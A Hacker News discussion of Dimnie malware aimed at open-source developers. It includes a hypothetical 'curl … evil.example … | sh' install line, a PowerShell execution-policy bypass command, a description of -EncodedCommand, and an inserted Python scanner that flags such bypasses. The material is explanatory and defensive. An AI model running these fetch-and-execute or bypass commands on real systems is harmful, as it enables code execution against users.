
Dimnie: Malware targeting open-source developers - justinclift
https://arstechnica.co.uk/security/2017/03/someone-is-putting-lots-of-work-into-hacking-github-developers/
======
jszymborski
Open-source developers are understandably high value targets, but I'd imagine
they're harder to hit with this kind of attack.

If I was some evil-doer though I'd develop some marketing heavy
Javascript/Rust/language-of-the-week framework, hit HN frontpage and have the
call-to-action copy be:

> Install in picoseconds!

> curl -sf http://evil.example/evil_install.sh | sh

edit: corrected hypothetical attack

~~~
tyingq
pedantic, but that wouldn't actually do much ;)

~~~
jszymborski
lool oops, thanks. Fixed it up :)

------
Animats
_... starts with e-mails that attach a booby-trapped Microsoft Word document.
The file contains a malicious macro that uses PowerShell commands._

It's good to know that the traditional vulnerabilities of Microsoft Word
documents have been updated to use the new PowerShell.

~~~
pjmlp
Except that Powershell doesn't run scripts unless you explicitly disable it as
Administrator.

~~~
SCHiM
This is not a security feature, and should not be relied upon. For example,
unelevated users can run the following command: `PS> Set-ExecutionPolicy
Bypass -Scope Process` to allow script execution in the current PowerShell
process.

Also, you can pass complete PowerShell scripts over the command line, which
bypasses the script restriction (because you can just input your entire script
over the command line).

This is done with the -E (-EncodedCommand) flag, which takes a base64 encoded
string with statements separated by semicolons.
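A defender-side illustration of the two points above, added here and not part of the thread or the article: a small scanner for process-creation log lines that decodes a `-E`/`-EncodedCommand` argument (base64 of a UTF-16LE string, as the comment describes) and flags execution-policy bypasses in both the raw and decoded command line. The `CommandLine=` log shape, the sample lines and the `build_sample_line` helper are constructed for the demonstration.

```python
import base64
import re

# Abbreviations powershell.exe accepts for -EncodedCommand (prefix matching).
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}

# Execution-policy bypass, either as a cmdlet call inside a script or as a
# command-line switch (-ExecutionPolicy and its common prefixes).
BYPASS_PATTERNS = [
    re.compile(r"set-executionpolicy\s+(bypass|unrestricted)", re.I),
    re.compile(r"-(executionpolicy|exec|ex|ep)\s+(bypass|unrestricted)", re.I),
]


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand argument: base64 wrapping UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def analyze_command_line(cmdline: str) -> dict:
    """Return {'encoded', 'decoded', 'bypass'} findings for one command line."""
    tokens = cmdline.split()  # base64 contains no whitespace, so this is safe
    findings = {"encoded": False, "decoded": "", "bypass": False}
    for i, tok in enumerate(tokens):
        if tok.lower() in ENCODED_FLAGS and i + 1 < len(tokens):
            try:
                findings["decoded"] = decode_encoded_command(tokens[i + 1])
                findings["encoded"] = True
            except (ValueError, UnicodeDecodeError):
                pass  # not valid base64/UTF-16LE: leave it flagged as plain text
    # Search the raw command line and the decoded script together.
    text = cmdline + " " + findings["decoded"]
    findings["bypass"] = any(p.search(text) for p in BYPASS_PATTERNS)
    return findings


def build_sample_line(script: str) -> str:
    """Constructed log line (assumed 'CommandLine=' shape) carrying an encoded script."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"CommandLine=powershell.exe -NonInteractive -E {b64}"


# Constructed sample log lines: encoded bypass, plain-text bypass, benign build script.
SAMPLE_LOGS = [
    build_sample_line("Set-ExecutionPolicy Bypass -Scope Process; Get-Date"),
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\build.ps1",
    "CommandLine=powershell.exe -File C:\\scripts\\build.ps1",
]


def scan(lines):
    """Analyze every line that carries a CommandLine= field."""
    return [analyze_command_line(l.split("CommandLine=", 1)[1])
            for l in lines if "CommandLine=" in l]
```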

~~~
pjmlp
As an occasional PowerShell user I wasn't aware of it, thanks for the heads up.

------
TTPrograms
Wait, you can still get viruses from opening word documents? What is this,
1998?

Good to know that Microsoft is focusing on the important things.[0]

[0]
[https://en.wikipedia.org/wiki/Tay_(bot)](https://en.wikipedia.org/wiki/Tay_\(bot\))

------
miohtama
Not sure if Windows PowerShell scripts are the best way to target open source
developers, as these power users are usually on Linux/OSX

~~~
justinclift
That's true, but it's not unreasonable to foresee the creators making
OSX/Linux versions too if these Windows ones "go ok" from their point of view.
:(

What's worrying to me is the wording of the emails themselves. It's much
better, and more likely appearing "legit" than the vast multitude of
scam/trojan/similar .pdf/.xls/.doc/.lnk/etc emails I've seen. (several a day
generally)

~~~
pjmlp
With the now current _curl | sh_ pattern, one just needs some MITM attack, or
even just to trick someone into doing it, as the majority never look at the
contents of the shell script.

~~~
jjirsa
It's been demonstrated in the past that a server can detect the pipe to shell
and modify content - timing attack, if I recall correctly

~~~
samsonradu
How does it work? Any sources?

~~~
drdaeman
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

~~~
samsonradu
Thanks, that's very interesting.

------
davidgerard
The takeaway appears to be: don't develop on a Windows box.

What happens if you open the claimed Word doc in LibreOffice?

------
kingosticks
What's the purpose of all those localhost ping lines in the delete script?

~~~
h4waii
The author likely is used to Windows scripting before sleep was a thing.

The pings are used as a delay, without pausing the entire process or thread.

~~~
Godel_unicode
More likely the author knows that sleep is a common thing for malware scanners
to look for, and chose a sneakier method to achieve the same goal.

------
codedokode
They could just put malware into one of the popular Node.js modules. Nobody would
notice because Linux/Mac users don't use antivirus.

~~~
auspex
This is why most companies have a build step in their CI/CD pipeline that
scans for CVE/malware in their app's dependencies (jar, npm packages, Ruby
gems etc)

~~~
srd
While the concept sounds sound, so far I've never actually seen this setup in
the real world. Do you happen to have any resources on how to properly set up
such a step in a CI tool?

~~~
auspex
Check out software like Twistlock, Sonatype and I think Tenable has a scanner
as well that integrates into the pipeline. If you are not using Sonatype to
build you can find good support for this in Jenkins or Team City via a plugin
(Full disclosure, I work in this area)

------
dang
Url changed from
https://arstechnica.co.uk/security/2017/03/someone-is-putting-lots-of-work-into-hacking-github-developers/,
which points to this. There was a small discussion at
https://news.ycombinator.com/item?id=13992005
but perhaps changing the url to the original article will stimulate a more
substantive one.

Submitters: please submit original sources, as the site guidelines ask
([https://news.ycombinator.com/newsguidelines.html](https://news.ycombinator.com/newsguidelines.html)).
Myriads of blog posts and articles mostly just point to something else; be a
good HN submitter and do the pointer traversal for the rest of us.

~~~
skrebbel
In all honesty, Ars does a real value-add in this case. I'm an open source
developer on Windows so this feels relevant, but the original article forces
me to read through a very long, highly technical article full of HTTP logs and
hex dumps just to find out how this could impact me. About halfway through I
gave up and then I was happy I found your comment with the Ars link.

~~~
dang
That's a good point. I've changed the URL back from
http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/.

